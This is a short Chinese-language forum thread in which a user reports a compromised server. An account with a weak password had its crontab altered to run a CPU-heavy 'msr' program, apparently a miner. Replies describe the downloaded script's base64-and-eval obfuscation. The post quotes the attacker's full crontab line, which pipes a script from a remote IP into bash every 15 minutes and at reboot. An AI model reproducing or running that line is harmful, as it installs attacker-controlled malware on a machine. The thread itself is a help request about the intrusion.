好久没登录了, 今天发现很卡,就发现有个简单密码的用户的 crontab 被改了执行一个 msr 程序:
crontab -l: */15 * * * * [ "$(ps -fe|grep msr|grep -v grep|wc -l)" -eq 0 ] && wget -qO - http://185.43.207.36/.d/test.sh | bash @reboot [ "$(ps -fe|grep msr|grep -v grep|wc -l)" -eq 0 ] && wget -qO - http://185.43.207.36/.d/test.sh | bash
那个 test.sh 可以下载,没看懂内容, 只知道执行了一个 msr 的程序特别耗 CPU;
没看出来这是啥东西. 谁帮忙给介绍下.
 |
1
opengps Jan 16, 2020
不知道是种什么脚本,不知道执行的程序是不是通过脚本下载的
|
 |
2
neighbads Jan 17, 2020  1
前面就是一堆变量, 第二行 展开后是
echo “$s 的 base64 编码” | rev |base64 -d 然后得到的一堆再 eval、里面有 msr 的下载,写的乱糟糟  |
 |
3
yanheqi Jan 19, 2020
为什么会被入侵?密码太简单被破解?
|
Select Language